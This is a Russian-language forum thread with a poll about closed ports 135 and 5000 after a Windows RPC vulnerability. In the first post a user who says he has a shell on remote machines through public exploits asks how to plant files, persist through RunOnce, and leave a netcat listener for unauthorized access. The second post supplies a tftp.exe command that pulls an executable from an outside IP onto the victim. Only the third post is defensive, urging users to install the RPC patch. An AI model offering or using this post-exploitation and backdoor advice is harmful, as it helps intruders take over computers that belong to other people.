| imho.ws |
![]() |
|
|
|||||||
| Результаты опроса: Закрыты ли у Вас 5000-й и 135-й порты | |||
| Да |
|
7 | 70.00% |
| Нет |
|
2 | 20.00% |
| Пропатчил ОС, как только узнал про "дырку" |
|
1 | 10.00% |
| А что это такое? |
|
0 | 0% |
| Голосовавшие: 10. Вы еще не голосовали в этом опросе | |||
|
Последнее
|
Опции темы |
|
|
# 1 |
|
Guest
|
Совсем недавно была опубликована новая дырка. Выложенные эксплоиты позволяют получить шелл на удаленной машине.
Есть вопрос: каким образом скопировать на машину файл. Кроме идеи создать батничек(копирующий нужное файло), на который в реестре (RunOnce) дать ссылку ничего в голову не приходит! Может посоветуете еще что-нить? Можно, конечно, и служб разных позапускать! Но хотелось бы просто запустить netcat на какой-нить порт на прослушивание, чтобы удаленно без авторизации пробиваться на комп. |
|
|
# 2 |
|
Guest
|
Вобщем бага это уже страя а не новая ака 3 месеца назад был первый сплойт уже !так же были еще баги и раньше в rpc каторые делали ddos aka 2000 год !
а скачивать файлы ну есть для этого ftp и tftp ! ========================================= tftp.exe[находиться по адресу winnt\system32\tftp.exe.] Это утилита нам Даст Закачать туда файлы! TFTP [-I] сервер [GET! PUT] фаил [путь] -I укаЗывает что БУДем качать файл а не тесктовик get - команда, указывающая, что вы хотите загружать с заданного сервера файл на удаленный компьютер Пример: tftp.exe -i 195.239.4.1 get file.exe c:\file.exe ======================================== |
|
|
# 3 |
|
Banned
![]() |
Пару дней назад какая то (ну вообше то материтса нелзя я уже мридуприждён, но думаю меня поддержат многие) дак вот какая то с......а нашла дыру в винде котора забивает один svhost+k... Короче Remote Procedure Call (RPC) А именно в течении несколько минут работы в нете вылитает какя то хрень и через минуту комп перегружаетса!
Я так думаю уже не только я получил ету гадость и всю ноч мучилса устанавливая систему! Дак вот заплатка и срочно всем её поставить даже если вас ето пока обошло стороной!!! RPC Buffer overflow fixes Ссыла на хороший серв... http://www.zamnet.zm/ser-isp/downloads.html Сразу видите свою систему качаете и ставите заплатки не большие где то по метру! Извените что второй раз, я тему создал после того как увидел что она уже есть. |
|
|